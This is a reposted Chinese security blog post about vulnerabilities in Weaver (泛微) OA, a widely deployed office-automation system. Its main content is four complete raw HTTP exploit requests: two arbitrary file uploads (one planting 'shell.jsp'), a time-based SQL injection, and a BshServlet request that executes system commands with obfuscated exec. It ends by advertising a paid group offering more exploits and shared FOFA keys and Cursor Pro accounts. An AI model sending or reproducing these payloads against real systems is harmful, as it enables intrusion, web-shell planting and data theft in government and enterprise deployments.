文章总结: 文章介绍了泛微OA系统的多个安全漏洞,包括历史漏洞和一个新的0day反序列化命令执行漏洞。文章详细描述了action.jsp任意文件上传、addTaste接口SQL注入、addResume任意文件上传和远程代码执行等漏洞的利用方法。作者提供了代码审计的核心路径,建议通过web.xml和路由文件锁定用户可控入口,追踪输入点至危险函数调用处。对于0day漏洞,作者将其放在知识星球中分享,并推广了该知识星球平台。
综合评分: 75
文章分类: 漏洞分析,代码审计,0day,WEB安全,应急响应
【0day】泛微OA从历史漏洞到全新0day,附EXP
原创
SharkSec
SharkSec
2025年12月4日 21:52
🔔 温馨提示:为了防止走散,不错过每一篇干货内容,请记得将公众号设置为星标!🌟
【声明】本文技术、思路及工具仅用于合法安全测试与防御研究,严禁用于非法入侵、攻击他人系统或盈利等违法违规行为,一切后果由操作者自行承担,作者及团队不承担任何连带责任。
系统介绍
泛微OA 是主流的国产OA厂商之一,其产品线覆盖三大核心平台,广泛部署于政府机关、央企、金融、教育等关键行业,具有极高的资产密度与攻击面价值。
泛微OA采用Java(e-cology/E-Weaver)与PHP(E-Office)双栈架构,代码量庞大、框架混杂(Struts2 + Spring MVC + 自研Weaver Framework + ThinkPHP),传统黑盒扫描极易漏报,因此在有源码的情况下,可进行白盒测试,进一步挖掘漏洞。
其代码审计的核心路径是:先从web.xml和路由文件锁定所有用户可控入口(如/weaver/*、/iweboffice/officeserver2.php),再逆向追踪getParameter()/$_GET等输入点至危险函数调用处(如file_get_contents()、Runtime.exec()、Statement.executeQuery()),重点验证其参数是否未经白名单校验、路径规范化或SQL预编译,最后结合泛微特有的框架逻辑(如weaver.common.Ctrl反射分发、bsh.servlet.BshServlet调试后门、officeserver2.php模板加载机制)组装可利用链——实践中90%的高危漏洞均源于“输入未净化+上下文权限缺失+补丁修复不彻底”三重叠加。
1
action.jsp 任意文件上传漏洞
POST/mobilemode/Action.jsp?invoker=com.weaver.formmodel.mobile.ui.servlet.MobileAppUploadAction&action=imageHTTP/1.1Host:User-Agent:Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;Trident/4.0;SV1;QQDownload732;.NET4.0C;.NET4.0E;SE2.XMetaSr1.0)Content-Length:152Content-Type:multipart/form-data;boundary=---***Accept-Encoding:gzip,deflate,brConnection:close
-----***Content-Disposition:form-data;name="upload";filename="test.txt"Content-Type:text/plain
yLHay4MIqQyZdrlOMFItwFc8xNBGtWLG-----***--
2
addTaste接口SQL注入漏洞
GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36Accept: */*Cookie: EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18; sl-session=BmCjG8ZweGWzoSGpQ1QgQg==; EBRIDGE_JSESSIONID=21D2D790531AD7941D060B411FABDC10Accept-Encoding: gzipSL-CE-SUID: 25
3
addResume存在任意文件上传漏洞
POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1Host: Content-Length: 361Cache-Control: max-age=0sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryD5Mawpg068t7pbxZContent-Disposition: form-data; name="file"; filename="1.jsp"Content-Type: application/octet-stream127------WebKitFormBoundaryD5Mawpg068t7pbxZContent-Disposition: form-data; name="file"; filename="shell.jsp"Content-Type: application/octet-stream127------WebKitFormBoundaryD5Mawpg068t7pbxZ--
4
远程代码执行
POST /weaver/bsh.servlet.BshServlet HTTP/1.1Host: Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Length: 98Content-Type: application/x-www-form-urlencodedbsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
5
0day–反序列化命令执行漏洞
关于本次0day的完整审计过程、POC/EXP、后渗透利用及系统源码,为安全起见将不再公开至公众号,后续完整内容将统一上传至知识星球,后期也会陆续更新某蝶,某锁等0day和1day,敬请期待~
如果大家对我们的文章技术有什么建议或者工具使用上的反馈,都欢迎大家在评论区留言交流。对我们分享的文章感兴趣,想要深入探讨、交流并学习更多相关内容,也欢迎各位师傅加入官方技术交流群!!!(关注公众号,点击菜单栏:联系我们->技术交流群,添加管理员微信,备注【加群】,拉您进群)
加入星球,一起进阶!
我们星球刚建设开放不久,大量福利来袭:有一线团队的一手攻防经验、私有工具源码(包括咱们公众号发的工具,星球里能直接拿源码 + 持续迭代),还有漏洞挖掘的 POC/EXP、每月定期两次 0day 分享,hw实战攻防遇见高频oa/设备源码都能在这拿到。
技术方向也刚好对标咱们平时的需求:工具开发、漏洞挖掘、代码审计、实战攻防这些全涵盖,甚至连 AI 安全的新玩法也会同步。
对了,星球里还有些「刚需资源」:FOFA 的 Key 长期能用,Cursor Pro 共享账号登了就能用; 企业 SRC 案例、红队实战经验也会拆解着讲。
现在星球现价 119 / 人,等满 100 人就涨到 129 了 —— 入了星球还能进专属内部群,比咱们公开交流群的资源更新更实时、讨论也更深度。
想上车的朋友直接扫描文末二维码了解详情,早入早享资源~
结束
👉 点击关注不迷路,一起潜入深水区,突破边界,共同精进!🚀
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:SharkSec SharkSec《【0day】泛微OA从历史漏洞到全新0day,附EXP》